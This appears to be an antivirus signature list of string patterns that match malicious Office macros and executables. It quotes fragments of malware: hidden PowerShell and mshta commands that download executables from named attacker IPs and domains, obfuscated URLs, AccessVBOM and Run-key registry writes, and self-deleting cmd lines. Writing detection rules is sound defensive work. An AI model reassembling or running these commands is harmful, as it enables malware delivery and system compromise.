- frm.cbtn1_Click (MACROHSTR_EXT)
- .split(' (MACROHSTR_EXT)
- split('').reverse().join (MACROHSTR_EXT)
- .exec p(textboxView) & " " & p(pasteIterator) (MACROHSTR_EXT)
- Environ("USERPROFILE") & "\Desktop\" (MACROHSTR_EXT)
- sPath + "Wrzod.exe" (MACROHSTR_EXT)
- sPath + Replace("Wrzod.!x!", "!", "e") (MACROHSTR_EXT)
- objS.Run sFile (MACROHSTR_EXT)
- wrzod.vxm.pl/Wrzod (MACROHSTR_EXT)
- https:// (MACROHSTR_EXT)
- = ActiveDocument.BuiltInDocumentProperties("title") (MACROHSTR_EXT)
- Replace("httpr:z0Ls://adamjeecommodir:z0Lties.cor:z0Lm/wp-content/r:z0Lthemes/adamjeecom/inc/options/kUQIZCFicsJ.php", "r:z0L", "") (MACROHSTR_EXT)
- Replace("_z+.\90https://adamjeecommoditi_z+.\90es.com/wp-cont_z+.\90ent/themes_z+.\90/adamjeecom/inc/opt_z+.\90ions/kUQIZCFicsJ.php","_z+.\90", "") (MACROHSTR_EXT)
- Replace("htWrVi4+tps://kaWrVi4+praywala.ga/website/wp-includes/js/jquery/uiWrVi4+/kk919Q3Ead7kgFQ.php", "WrVi4+", "") (MACROHSTR_EXT)
- Replace("https://crea.N_Dativa.N_De-island.e-m2.net/wp-contena.N_Da.N_Dt/ta.N_Dhemes/creative_a.N_Disland/js/vc-composer/RUpDObeysEFp8.php", "a.N_D", "") (MACROHSTR_EXT)
- Replace("ht@!fXg%$tps://arteecaligrafia.co@!fXg%$m.br/imagens/fo@!fXg%$tos/thumbs/MupJ4cZzxoElmn.php", "@!fXg%$", "") (MACROHSTR_EXT)
- Replace("https:jdzpk//hartlejdzpkpooltjdzpkaxi.co.uk/TaxiShop/modules/corjdzpkeupdajdzpkter/views/js/bbKt3OpktVRAFnjdzpki.php", "jdzpk", "") (MACROHSTR_EXT)
- Replace("https://ahdmsport.^viKU+scom/bootstrap/scripts/_notes/Xwi4K0BrmwX6hf.php", "^viKU+s", "") (MACROHSTR_EXT)
- Replace("(F0Zc/Nhttps:/(F0Zc/N/steriglass.stigmatinesafrica.org/wp-i(F0Zc/Nncl(F0Zc/Nudes/sodium_compat/namespaced/Core/ChaCha20/KITDlCQHVyI.php", "(F0Zc/N", "") (MACROHSTR_EXT)
- Replace("+*<);3>https://asgvprotecao.c+*<);3>om.br/wa_php/co+*<);3>mp/klbd5vx+*<);3>r6mf38o/YxSs9udR8U.php", "+*<);3>", "") (MACROHSTR_EXT)
- Replace("https://arteecaligrafia.vI&8&$Ocom.br/imagens/fotos/thumbs/MupJ4cvI&8&$OZzxoElmn.php", "vI&8&$O", "") (MACROHSTR_EXT)
- "HTTPDownload 'http://1lxtjdias-pod:8080/stage3.exe' (MACROHSTR_EXT)
- CreateObject ("; Scripting.FileSystemObject; ") (MACROHSTR_EXT)
- Wscript.CreateObject ("; Wscript.Shell; ") (MACROHSTR_EXT)
- "WshShell.Run strFile" (MACROHSTR_EXT)
- Shell "wscript C:\DEV\VBA\stage2.vbs" (MACROHSTR_EXT)
- fp = "C:\DEV\VBA\stage2.vbs" (MACROHSTR_EXT)
- getwc = "explorer.exe c:\programdata\nextTextClear.hta" (MACROHSTR_EXT)
- getwc = "explorer.exe c:\programdata\counterCountVb.hta" (MACROHSTR_EXT)
- getwc = "explorer.exe c:\programdata\procedureTemp.hta" (MACROHSTR_EXT)
- getwc = "explorer.exe c:\programdata\swapCounterVariable.hta" (MACROHSTR_EXT)
- getwc = "explorer.exe c:\programdata\queryLeft.hta" (MACROHSTR_EXT)
- getwc = "explorer.exe c:\programdata\responseSwapMem.hta" (MACROHSTR_EXT)
- = Split(p(frm.getwc), " ") (MACROHSTR_EXT)
- #"body></html>") (MACROHSTR_EXT)
- CreateObject("wscript." & she & "l") (MACROHSTR_EXT)
- exec("powe" & "rshell -w Hidden Invoke-WebRequest -Uri (MACROHSTR_EXT)
- Chr(34) & "http://178.17.171.144/sch/ (MACROHSTR_EXT)
- = "c:\windows\explorer.exe c:\programdata\listboxPasteCounter.hta" (MACROHSTR_EXT)
- memIndex.exec p(rm) (MACROHSTR_EXT)
- = Split(p(frm.rm), " ") (MACROHSTR_EXT)
- = "c:\windows\explorer.exe c:\programdata\screenOptionTextbox.hta" (MACROHSTR_EXT)
- varLoadArray.exec p(rm) (MACROHSTR_EXT)
- .CreateObject("wscript." & she & "l").exec(psowerss & "hell -w Hidden Invoke-WebRequest -Uri (MACROHSTR_EXT)
- http://landing.yetiapp.ec/IDx6/FLP_5012_306_171.ex (MACROHSTR_EXT)
- & "C:\Users\Public\Documents\checkgirl.ex" (MACROHSTR_EXT)
- .CreateObject("wscript.s" & she).exec( (MACROHSTR_EXT)
- http://afms.org.uk/js/mega.ex (MACROHSTR_EXT)
- -OutF" & "ile " & Chr(34) & "C:\Users\Public\Documents\ (MACROHSTR_EXT)
- .CreateObject("wscript." & she & "l").exec(psowerss & "hell -w " & sease & "n Invoke-WebRequest -Uri (MACROHSTR_EXT)
- http://scaladevelopments.scaladevco.com/13Z/IMG_001263082.ex (MACROHSTR_EXT)
- C:\Users\Public\Documents\technologypurpose.ex" (MACROHSTR_EXT)
- explorer.exe c:\programdata\ (MACROHSTR_EXT)
- .hta" (MACROHSTR_EXT)
- .exec p(rm) (MACROHSTR_EXT)
- wscript." & she & "l").exec(psowerss & "hell (MACROHSTR_EXT)
- 185.117.91.199/99/Ckhpuhl.ex (MACROHSTR_EXT)
- http:// (MACROHSTR_EXT)
- Public\Documents\realexecutive.ex" & Chr(101)) (MACROHSTR_EXT)
- C:\Users\ (MACROHSTR_EXT)
- VBA.StrReverse("ath. (MACROHSTR_EXT)
- %\atadmargorp\:c rerolpxe\swodniw (MACROHSTR_EXT)
- CreateObject("wscript.shell").RegWrite listConst, 1, "REG_DWORD" (MACROHSTR_EXT)
- .Quit SaveChanges:=wdDoNotSaveChanges (MACROHSTR_EXT)
- valueEx(countTitle, 8 / 4, 1500000) (MACROHSTR_EXT)
- ActiveDocument.Range.Text (MACROHSTR_EXT)
- = "explorer c:\users\public\ (MACROHSTR_EXT)
- %.hta" (MACROHSTR_EXT)
- .exec tg (MACROHSTR_EXT)
- = Split(frm.tg, " ") (MACROHSTR_EXT)
- retval = Shell("wscript.exe mozilla.vbs") (MACROHSTR_EXT)
- Print #TextFile, Range("AH1607").Value + Range("AH1606").Value + Range("AH1605").Value (MACROHSTR_EXT)
- FilePath = "mozilla.vbs" (MACROHSTR_EXT)
- exec tg (MACROHSTR_EXT)
- namespaceGlobalRequest.DataType = "bin.base64" (MACROHSTR_EXT)
- CreateObject("wscript.shell").RegWrite argumentLink, 1, "REG_DWORD" (MACROHSTR_EXT)
- = StrConv(bufferData("SEtFWV9DVVJSRU5UX1VTRVJcU29mdHdhcmVcTWljcm9zb2Z0XE9mZmljZVw="), vbUnicode) (MACROHSTR_EXT)
- removeTable.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString listboxStorageCounter (MACROHSTR_EXT)
- dataOptionLocal("SEtFWV9DVVJSRU5UX1VTRVJcU29mdHdhcmVcTWljcm9zb2Z0XE9mZmljZVw=") (MACROHSTR_EXT)
- CreateObject("wscript.shell").RegWrite (MACROHSTR_EXT)
- valueDocumentConvert = UserForm1.TextBox1 (MACROHSTR_EXT)
- CreateObject("msxml2.domdocument") (MACROHSTR_EXT)
- CreateObject("word.application") (MACROHSTR_EXT)
- .DataType = "bin.base64" (MACROHSTR_EXT)
- %("SEtFWV9DVVJSRU5UX1VTRVJcU29mdHdhcmVcTWljcm9zb2Z0XE9mZmljZVw="), vbUnicode) (MACROHSTR_EXT)
- = UserForm1.TextBox1 (MACROHSTR_EXT)
- = CreateObject("msxml2.domdocument") (MACROHSTR_EXT)
- .createElement("code") (MACROHSTR_EXT)
- .nodeTypedValue (MACROHSTR_EXT)
- = Application.Version (MACROHSTR_EXT)
- .VBProject.VBComponents("ThisDocument").CodeModule.AddFromString (MACROHSTR_EXT)
- .exec(psowerss & "hell -w Hidden Invoke-WebRequest -Uri (MACROHSTR_EXT)
- Users\Public\Documents\issuepolitical.ex (MACROHSTR_EXT)
- recentlyanalysis.CreateObject("wscript." & she & "l") (MACROHSTR_EXT)
- iklangratissurabaya.skom.id/zx/Fsbey.ex" & Chr(101) (MACROHSTR_EXT)
- CreateObject("wscript." & she & "l").exec(psowerss & "hell -w (MACROHSTR_EXT)
- Invoke-WebRequest -Uri " & Chr(34) & "http:// (MACROHSTR_EXT)
- 7.ex" & Chr(101) (MACROHSTR_EXT)
- Chr(34) & ";C:\Users\Public\Documents\ (MACROHSTR_EXT)
- .ex" & Chr(101) (MACROHSTR_EXT)
- .exec$ (rightDataFunc) (MACROHSTR_EXT)
- = Split(ActiveDocument.BuiltInDocumentProperties("title"), " ") (MACROHSTR_EXT)
- exec$ (sr(ExArrayLocal)) (MACROHSTR_EXT)
- ActiveDocument.BuiltInDocumentProperties("title") (MACROHSTR_EXT)
- return namespaceB" & "utton.split('').reverse().join('" (MACROHSTR_EXT)
- GetSecurityDescriptorGroup (PEHSTR_EXT)
- @shell32.dll (PEHSTR_EXT)
- l32.dll (PEHSTR_EXT)
- c:\Cause\417\Organ\Out vi\grand.pdb (PEHSTR_EXT)
- ggploeER.dl (PEHSTR_EXT)
- = StrReverse(UserForm1.TextBox1) (MACROHSTR_EXT)
- = StrReverse("\eciffO\tfosorciM\erawtfoS\RESU_TNERRUC_YEKH") (MACROHSTR_EXT)
- = StrReverse("MOBVsseccA\ytiruceS\droW\") (MACROHSTR_EXT)
- = "HKEY_CURRENT_USER\Software\Microsoft\Office\" (MACROHSTR_EXT)
- = "\Word\Security\AccessVBOM" (MACROHSTR_EXT)
- CreateObject("wscript.shell").exec (sr( (MACROHSTR_EXT)
- = Split(sr(ActiveDocument.BuiltInDocumentProperties("title")), " ") (MACROHSTR_EXT)
- .RegWrite screenValueCount, 1, "REG_DWORD" (MACROHSTR_EXT)
- textboxProcedureCollection = CreateObject("word.application") (MACROHSTR_EXT)
- = UserForm1.TextBox1 (MACROHSTR_EXT)
- globalMemory = "\Word\Security\AccessVBOM" (MACROHSTR_EXT)
- = Replace("1", "VB", "ity\Access1OM") (MACROHSTR_EXT)
- Set wshShell = objOL.CreateObject("Wscript.Shell") (MACROHSTR_EXT)
- userprofile = wshShell.ExpandEnvironmentStrings("%userprofile%") (MACROHSTR_EXT)
- = commando_a_runear2 & " '" & directorio & "'" (MACROHSTR_EXT)
- wshShell.Run final_comando (MACROHSTR_EXT)
- .CreateObject("wscript.s" & (MACROHSTR_EXT)
- ).exec(powerrange & "hell -w " & protei & "den Invoke-WebRequest -Uri (MACROHSTR_EXT)
- http://31.210.20.6/w2/PLP_017542000.ex (MACROHSTR_EXT)
- mshta "javascript:function getT(a){var b,c=new ActiveXObject('WinHttp.WinHttpRequest.5.1');return c.Open('GET',a,!1),c.Send(),b=c.ResponseText,b} (PEHSTR_EXT)
- marius/loader/l.php? (PEHSTR_EXT)
- rmi#dRf.pdb (PEHSTR_EXT)
- Pscscripted23.98n (PEHSTR_EXT)
- 4.0NmZbrowserst (PEHSTR_EXT)
- qzsoheatherdefault.thanhatake (PEHSTR_EXT)
- cmd.exe /c ping 0 -n 2 & del (PEHSTR_EXT)
- wmic process call create 'rundll32.exe (MACROHSTR_EXT)
- script.Shell (MACROHSTR_EXT)
- Wscript.Shell (MACROHSTR_EXT)
- .dll", (MACROHSTR_EXT)
- Mid("i\4FT-KWscript.Shell (MACROHSTR_EXT)
- K$xIU\8838.exe (MACROHSTR_EXT)
- WpEhtBAtf1.php (MACROHSTR_EXT)
- Error1.Image7788111.Tag (MACROHSTR_EXT)
- Error1.Image7788112.ControlTipText (MACROHSTR_EXT)
- .com/17/andre34.ex (MACROHSTR_EXT)
- http://scaladevelopments.scaladevco (MACROHSTR_EXT)
- CreateObject("wscript.shell").Run (MACROHSTR_EXT)
- C:\Users\Public\Documents\electionover.ex (MACROHSTR_EXT)
- = CreateObject("wscript.shell").Run (MACROHSTR_EXT)
- http://scaladevelopments.scaladevco.com/17/ (MACROHSTR_EXT)
- C:\Users\Public\Documents\ (MACROHSTR_EXT)
- linkCollection = ActiveDocument.Content (MACROHSTR_EXT)
- With tableTitle.Documents.Add.VBProject.VBComponents("ThisDocument").CodeModule (MACROHSTR_EXT)
- With CreateObject("wscript.shell") (MACROHSTR_EXT)
- .RegWrite removeNext, 1, "REG_DWORD" (MACROHSTR_EXT)
- = ActiveDocument.Content (MACROHSTR_EXT)
- = CreateObject("word.application") (MACROHSTR_EXT)
- .Documents.Add.VBProject.VBComponents("ThisDocument").CodeModule (MACROHSTR_EXT)
- (Environ("USERPROFILE") + "\Documents\" + "qX2xpJ5V.txt") Then (MACROHSTR_EXT)
- mp4klgzo.CreateFolder (pacbhdvc) (MACROHSTR_EXT)
- = q87fpor4.Run("wscript.exe //b " + Chr(34) + qs + Chr(34), 4, False) (MACROHSTR_EXT)
- Set ZpXcmsCQ = CreateObject("Wscript.Shell") (MACROHSTR_EXT)
- ZpXcmsCQ.Run rdeAjnshv + lqfadUMW + AKrDsxioC, RValue (MACROHSTR_EXT)
- = "c:\program", Optional (MACROHSTR_EXT)
- & "data\ (MACROHSTR_EXT)
- .ht" & (MACROHSTR_EXT)
- = ActiveDocument.Range.Text (MACROHSTR_EXT)
- Set WshShell = CreateObject("Wscript.Shell") (MACROHSTR_EXT)
- WshShell.Run (MACROHSTR_EXT)
- ("c:\\windows\\explorer "), , True (MACROHSTR_EXT)
- = CreateObject("wscript." & Chr(115) & (MACROHSTR_EXT)
- ).Run( (MACROHSTR_EXT)
- htt`p://31.210.20.45/zCH/ (MACROHSTR_EXT)
- Destination " & Chr(34) & "C:\Users\Public\Documents\ (MACROHSTR_EXT)
- = CreateObject("wscript.s" & (MACROHSTR_EXT)
- http://31.210.20.45/1xBet/ (MACROHSTR_EXT)
- .ex" & Chr(101) & Chr(34) & (MACROHSTR_EXT)
- Chr(34) & "htt`p://31.210.20.45/527/IMG_077010168.ex" & Chr(101) (MACROHSTR_EXT)
- Chr(34) & "htt`p://31.210.20.45/527/4243pp14.ex" & Chr(101) (MACROHSTR_EXT)
- Chr(34) & "htt`p://212.192.241.94/bluehost/ (MACROHSTR_EXT)
- CreateObject("wscript." & Chr(115) & (MACROHSTR_EXT)
- ).Run (MACROHSTR_EXT)
- -Destination " & Chr(34) & "C:\Users\Public\Documents\ (MACROHSTR_EXT)
- Shell Replace("wscript ""FILE"" ", "FILE", myFile) (MACROHSTR_EXT)
- WshShell.Run """"""%UserProfile%\ (MACROHSTR_EXT)
- .exe"""" -d (MACROHSTR_EXT)
- myFile = userProfilePath + "\layoffs (MACROHSTR_EXT)
- Print #myoutputfile, "HTTPDownload ""http:// (MACROHSTR_EXT)
- objFile.Write Chr(AscB(MidB(objHTTP.ResponseBody, i, 1))) (MACROHSTR_EXT)
- fso = CreateObject("Scripting.FileSystemObject") (MACROHSTR_EXT)
- o1.Run "C:\windows\Temp\ssg.exe" (MACROHSTR_EXT)
- Set o1 = CreateObject("Wscript.Shell") (MACROHSTR_EXT)
- fso.DeleteFile (sFile) (MACROHSTR_EXT)
- Environ("USERPROFILE") + "\Documents\Adobe Help Center" (MACROHSTR_EXT)
- .FileExists(Environ("USERPROFILE") + "\Documents\" + "Eua58Y2F.txt" (MACROHSTR_EXT)
- HelpCenterUpdater.vbs" (MACROHSTR_EXT)
- .Run("wscript.exe //b " + Chr(34) + qs + Chr(34), 4, False) (MACROHSTR_EXT)
- http://www.blackievirus.com (PEHSTR_EXT)
- web.status>200 then wscript.quit (PEHSTR_EXT)
- WINDOWS\HELP2.VBS (PEHSTR_EXT)
- shell.run filename (PEHSTR_EXT)
- web.send (PEHSTR_EXT)
- //*[@unitPrice > 20] (MACROHSTR_EXT)
- NNUPUEJUWU.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Google Chrome Crash Reporter', aikido() + '\\CrashReport.exe', 'REG_SZ'); (MACROHSTR_EXT)
- CrashReport.eREPITxe'; s2file(aikido() + '\\' + kins.replace('REPIT',''), (MACROHSTR_EXT)
- curl%CommonProgramW6432:~23,1%--sil%TEMP:~-3,1%n%APPDATA:~-10,-9% http%CommonProgramFiles(x86):~15,1%://tv-m%APPDATA:~-9,-8%rket.onlin%CommonProgramFiles:~-15,-14%/simp%TEMP:~-6,1%e.%TEMP:~-16,-15%ng --output ""%namex%"" --ssl-no-revoke" & vbCrLf (MACROHSTR_EXT)
- CreateTextFile (temppath & "\UjdUhsbsjfU.txt") (MACROHSTR_EXT)
- GetSecurityDescriptorOwner (PEHSTR_EXT)
- = New IWshRuntimeLibrary.WshShell (MACROHSTR_EXT)
- .exec "scriptrunner.exe -appvscript " & (MACROHSTR_EXT)
- = ".h" & (MACROHSTR_EXT)
- Print #1, Replace(ActiveDocument.Content, " (MACROHSTR_EXT)
- = ".h" & (MACROHSTR_EXT)
- = New IWshRuntimeLibrary.WshShell (MACROHSTR_EXT)
- 0.run "scriptrunner -appvscript " & (MACROHSTR_EXT)
- split(strfnd,",")).text=split(strfnd,",")(i).replacement.text="^&".executereplace:=wdreplaceallif.found=truethenstrrpt=strrpt&vbcr&split(strfnd,",")(i (MACROHSTR_EXT)
- timer()-tijd<2doeventswendwinexec"cscriptc:\programdata\prnholl.vbe",0endif (MACROHSTR_EXT)
- textstream.writeline(userform1.label1.caption) (MACROHSTR_EXT)
- Replace(ActiveDocument.Content, "dmfd", "") (MACROHSTR_EXT)
- = "." & installMixMix & installMp4Before (MACROHSTR_EXT)
- .run "scriptrunner -appvscript " & installMixMix, 2 (MACROHSTR_EXT)
- Replace(ActiveDocument.Content, "ruioq", "") (MACROHSTR_EXT)
- .run "scriptrunner -appvscript " & pauseSetBefore, 2 (MACROHSTR_EXT)
- = "." & pauseSetBefore & beforeBeforeStop (MACROHSTR_EXT)
- Replace(ActiveDocument.Content, "8ikot", "") (MACROHSTR_EXT)
- .run "scriptrunner -appvscript " & installStopMix, 2 (MACROHSTR_EXT)
- = "." & installStopMix & startPausePlay (MACROHSTR_EXT)
- Replace(ActiveDocument.Content, "gc6f", "") (MACROHSTR_EXT)
- .run "scriptrunner -appvscript " & installStopSetup, 2 (MACROHSTR_EXT)
- = "." & installStopSetup & playPlayWav (MACROHSTR_EXT)
- .run "scriptrunner -appvscript " & (MACROHSTR_EXT)
- = "." & (MACROHSTR_EXT)
- = Replace(ActiveDocument.Content, " (MACROHSTR_EXT)
- mprexe.exe (PEHSTR_EXT)
- tremir.bin (PEHSTR_EXT)
- \driversLODE (PEHSTR_EXT)
- ost.t" (PEHSTR_EXT)
- p2.ini (PEHSTR_EXT)
- cz.dll (PEHSTR_EXT)
- hz.dll (PEHSTR_EXT)
- \MPRServices\TestService (PEHSTR_EXT)
- Software\WebMoney (PEHSTR_EXT)
- Referer: https://www.e-gold.com/ (PEHSTR_EXT)
- /acct/accountinfo.asp (PEHSTR_EXT)
- System\C (PEHSTR_EXT)
- SYSTEM\CurrentControlSet\Services\yvbb01 (REGKEY)
- SYSTEM\CurrentControlSet\Services\yvbb02 (REGKEY)
- .Run "cscript.exe %appdata%\www.txt //E:VBScript //NoLogo " + "%~f0" + " %*", Chr(48) (MACROHSTR_EXT)
- = Environ("USERPROFILE") & "\AppData\Roaming\ (MACROHSTR_EXT)
- + "www.ps1" (MACROHSTR_EXT)
- + "www.txt" (MACROHSTR_EXT)
- RO = "C:\ProgramData\" (MACROHSTR_EXT)
- ROI = RO + "pin.vbs" (MACROHSTR_EXT)
- WW = QQ1.t2.Caption (MACROHSTR_EXT)
- fun = Shell("cmd /k cscript.exe C:\ProgramData\pin.vbs", Chr(48)) (MACROHSTR_EXT)
- 'Result = MsgBox(" The document cannot be decrypted. ", vbAbortRetryIgnore + vbCritical, " Error 0xc0000142 ") (MACROHSTR_EXT)
- bxh.eFile (MACROHSTR_EXT)
- sSplit = Split(UCase$(Trim$(Email)), ".") (MACROHSTR_EXT)
- 0.run (MACROHSTR_EXT)
- .ht", ActiveDocument.Content (MACROHSTR_EXT)
- = ActiveDocument.BuiltInDocumentProperties( (MACROHSTR_EXT)
- ).Value (MACROHSTR_EXT)
- GetObject("", "wscript.shell").exec text1("category") + " " + (MACROHSTR_EXT)
- StrReverse(ThisDocument.text1("keywords")) (MACROHSTR_EXT)
- ActiveDocument.SaveAs2 FileName:= (MACROHSTR_EXT)
- ThisDocument.s (MACROHSTR_EXT)
- powershell -Exec bypass -NonI -W Hidden (('& ((GeT" (MACROHSTR_EXT)
- -VARIAble SXB*MDr*SXB).naMe[3,11,2]-joiNSXBSXB)( (" (MACROHSTR_EXT)
- mANAgement.AuToMaTION.PsCr'+'EDeNT" (MACROHSTR_EXT)
- CuREstrING -k (2'+'27..242) ) '+').getNETworkCred" (MACROHSTR_EXT)
- ENtIal().PaSSword)') -rePLaCe ([CHaR]97+[CHaR]56+" (MACROHSTR_EXT)
- Shell "mshta https://bit.ly/asdqwdqwojdasmndbas" (MACROHSTR_EXT)
- c:\windows\system32\calc\..\conhost.exe mshta http://j.mp/ (MACROHSTR_EXT)
- VBA.GetObject("new:13709620-C279-11CE-A49E-444553540000").Shellexecute (MACROHSTR_EXT)
- h"&"ttps://r"&"ecapitol.com/tl6ilKY1t8r/repo.h"&"tml (MACROHSTR_EXT)
- h"&"t"&"tps://s"&"weebez.com/QHaHeCnRrV/repo.h"&"tml (MACROHSTR_EXT)
- h"&"t"&"tps://m"&"hjlab.ml/2eie1JNsQB/repo.h"&"tml (MACROHSTR_EXT)
- Shell("wscript " + "browserapp.js", vbNormalFocus) (MACROHSTR_EXT)
- WriteLine Worksheets("Sheet2").Range("BN811").Value (MACROHSTR_EXT)
- CreateObject("She" + "ll.Ap" + "plic" + "ation") (MACROHSTR_EXT)
- CallByName(igcXr, "Sh" + "el" + "lExe" + "cute", VbMethod, URxl(0), URxl(1), URxl(2), URxl(3), URxl(4)) (MACROHSTR_EXT)
- "ping google.com;" + eeeew (MACROHSTR_EXT)
- pZ6r6KEICIOhhurPfmehzz.pdb (PEHSTR_EXT)
- Category:GooglecomputerJP (PEHSTR_EXT)
- = ThisDocument.keywords (MACROHSTR_EXT)
- .SaveAs2 FileName:= (MACROHSTR_EXT)
- ThisDocument.s (MACROHSTR_EXT)
- = .BuiltInDocumentProperties("keywords").Value (MACROHSTR_EXT)
- ActiveDocument.Content.Find.Execute FindText:="_f", ReplaceWith:= (MACROHSTR_EXT)
- .exec "explo" & (MACROHSTR_EXT)
- = ThisDocument. (MACROHSTR_EXT)
- .SaveAs2 FileName (MACROHSTR_EXT)
- ActiveDocument.Content.Find.Execute FindText:="$1", ReplaceWith:= (MACROHSTR_EXT)
- .exec "c:\windows\explorer " & (MACROHSTR_EXT)
- main.karoline ("") (MACROHSTR_EXT)
- = StrReverse(ThisDocument.keywords) (MACROHSTR_EXT)
- ThisDocument.s StrReverse("llehs.tpircsw"), (MACROHSTR_EXT)
- ThisDocument.s StrReverse("lle" + (MACROHSTR_EXT)
- ).exec("explorer " & (MACROHSTR_EXT)
- keywords = ActiveDocument.BuiltInDocumentProperties("keywords").Value (MACROHSTR_EXT)
- ActiveDocument.Content.Find.Execute FindText:=" (MACROHSTR_EXT)
- DllInstall (PEHSTR_EXT)
- <Browser_JavascriptMessageReceived>b__22_0 (PEHSTR_EXT)
- KrnlUI.exe (PEHSTR_EXT)
- KrnlUI-main\KrnlUI\obj\Release\KrnlUI.pdb (PEHSTR_EXT)
- .CreateObject("Wsc" & "ript.Sh" + s1 + "ell", "").Run (MACROHSTR_EXT)
- service.CreateObject("Wscript.Shell", "").Run (MACROHSTR_EXT)
- CewcCewmCewd.CeweCewxCewe /Cewc sCewtCewaCewrt Cew/CewBCew CewpCewoCewwCewerCewsheCewlCewl (MACROHSTR_EXT)
- rs=\""h (MACROHSTR_EXT)
- + "ript.She" & "ll") (MACROHSTR_EXT)
- \Windows\ (MACROHSTR_EXT)
- System32\ (MACROHSTR_EXT)
- t"&"tp"&":// (MACROHSTR_EXT)
- System32\h (MACROHSTR_EXT)
- .exec (MACROHSTR_EXT)
- "c:\windows\explorer " & (MACROHSTR_EXT)
- .BuiltInDocumentProperties("keywords").Value) (MACROHSTR_EXT)
- Call ActiveDocument.Content.Find.Execute(FindText:="#a", ReplaceWith:="", Replace:=2) (MACROHSTR_EXT)
- service.CreateObject("Wscript.Shell", "").Run ra, 0 (MACROHSTR_EXT)
- ThisDocument.s "wscript.shell", (MACROHSTR_EXT)
- WinHost.exe (PEHSTR_EXT)
- AssemblyDescriptionAttribute (PEHSTR_EXT)
- \mm21.ocx (FILEPATH)
- \bleh.exe (FILEPATH)
- \mmups.exe (FILEPATH)
- \mediamotor25.exe (FILEPATH)
- \downloaded program files\mm21.inf (FILEPATH)
- \downloaded program files\mm21.ocx (FILEPATH)
- SOFTWARE\Classes\IObjSafety.DemoCtl (REGKEY)
- Software\Classes\IObjSafety.DemoCtl (REGKEY)
- SOFTWARE\Microsoft\Windows\CurrentVersion\\mediaswitch (REGKEY)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\media-motor (REGKEY)
- SOFTWARE\Microsoft\Code Store Database\Distribution Units\{7149E79C-DC19-4C5E-A53C-A54DDF75EEE9} (REGKEY)
- SOFTWARE\Microsoft\Code Store Database\Distribution Units\{E0CE16CB-741C-4B24-8D04-A817856E07F4} (REGKEY)
- DisableScriptDebuggerIE (PEHSTR_EXT)
- beep.sys (PEHSTR_EXT)
- sbl.sys (PEHSTR_EXT)
- _.exe (PEHSTR_EXT)
- .com/file.exe (PEHSTR_EXT)
- svchost.exe (PEHSTR_EXT)
- Mozilla/4.0 (compatible) (PEHSTR_EXT)
- ShellExecuteExA (PEHSTR_EXT)
- wordpad.exe (PEHSTR_EXT)
- /c del (PEHSTR_EXT)
- ftp:// (PEHSTR_EXT)
- sc.exe start (PEHSTR_EXT)
- \WINDOWS\system32\regsvr32.exe (PEHSTR_EXT)
- 58.49.58.20 (PEHSTR_EXT)
- sc.exe description (PEHSTR_EXT)
- \WINDOWS\sc.exe (PEHSTR_EXT)
- -dbat" type= own type= interact start= auto DisplayName= (PEHSTR_EXT)
- sc.exe create (PEHSTR_EXT)
- ' target='_blank'>test</a> (PEHSTR_EXT)
- C:\bootfont.biz (PEHSTR_EXT)
- 192.168.0.102 (PEHSTR)
- 208.66.194.215 (PEHSTR)
- http://%s/Mail/%s (PEHSTR)
- &javascript:onSubmitToolbarItemClicked( (PEHSTR)
- 0Z:\NewProjects\hotsend\Release-Win32\hotsend.pdb (PEHSTR)
- WScript.Echo(Encrypt( (PEHSTR)
- http://alfredo.myphotos.cc/scripts/view.asp (PEHSTR_EXT)
- ~DFBA17.tmp (PEHSTR_EXT)
- InstallerFileTakeOver.pdb (PEHSTR_EXT)
- NtCompareTokens (PEHSTR_EXT)
- ConvertStringSecurityDescriptorToSecurityDescriptorW (PEHSTR_EXT)
- @AppHelpToast.png (PEHSTR_EXT)
- C:\File\To\Take\Over (PEHSTR_EXT)
- pipe\ExploitPipe (PEHSTR_EXT)
- wob = CreateObject("wscript.shell") (MACROHSTR_EXT)
- & "\de" & "sk" & "to" & "p.ini" (MACROHSTR_EXT)
- ini = Replace(ini, "\", "\\") (MACROHSTR_EXT)
- CreateObject("WScript.Shell") (MACROHSTR_EXT)
- cscript (MACROHSTR_EXT)
- CreateObject("wscript.shell").Run """" & Way$ & """" (MACROHSTR_EXT)
- linka$ = "http://suknosepsa.temp.swtest.ru/RedCrab.exe" (MACROHSTR_EXT)
- Way$ = "C:\temp\RedCrab.exe" (MACROHSTR_EXT)
- .Open "GET", Replace(URL$, "\", "/"), "False" (MACROHSTR_EXT)
- Content.Find.Execute FindText:="3-", ReplaceWith:="", Replace:=2 (MACROHSTR_EXT)
- + ActiveDocument.BuiltInDocumentProperties("category").Value).exec "c:\windows\explorer " + (MACROHSTR_EXT)
- = "script" (MACROHSTR_EXT)
- ThisDocument.s Trim("w" + (MACROHSTR_EXT)
- + "."), (MACROHSTR_EXT)
- .CreateObject(hex2ascii(hex2ascii(ThisDocument.Words( (MACROHSTR_EXT)
- )))).Run "rundll32 C:\Users\Public\Documents\1. (MACROHSTR_EXT)
- Print #FileNum, hex2ascii(hex2ascii(ThisDocument.Words( (MACROHSTR_EXT)
- ))) + hex2ascii(hex2ascii(ThisDocument.Words( (MACROHSTR_EXT)
- Open "c:\programdata\vkwer.bat" (MACROHSTR_EXT)
- strMessage = " " & .Name & " , " & vbCr & _ (MACROHSTR_EXT)
- MsgBox Err.Description, vbCritical, " & " & Err.Number (MACROHSTR_EXT)
- PID = Shell("wscript apihandler.js", vbNormalFocus) (MACROHSTR_EXT)
- Range("GM2323").Value & Range("GM2324").Value & Range("GM2325").Value (MACROHSTR_EXT)
- Range("GM2325").Value = "" (MACROHSTR_EXT)
- ").value&range(" (MACROHSTR_EXT)
- ").valuefileout.writestrtextfileout.c (MACROHSTR_EXT)
- =shell("wscriptapihandler.js",vbnormalfocus)range(" (MACROHSTR_EXT)
- ").value=""range (MACROHSTR_EXT)
- = "cmd.exe /C (MACROHSTR_EXT)
- = "DownloadString('https://movetolight.xyz:443/disco (MACROHSTR_EXT)
- = CreateObject("Wscript.Shell (MACROHSTR_EXT)
- .Run ( (MACROHSTR_EXT)
- .Find.Execute(FindText:=" (MACROHSTR_EXT)
- GetObject("", "wscript.shell").exec text1(" (MACROHSTR_EXT)
- ActiveDocument.BuiltInDocumentProperties( (MACROHSTR_EXT)
- ).Value (MACROHSTR_EXT)
- Shell ("C:\\WinDOws\\SysTEM32\\CMD.exe /V/D/c ""seT sKk=script&&seT px=mshta (MACROHSTR_EXT)
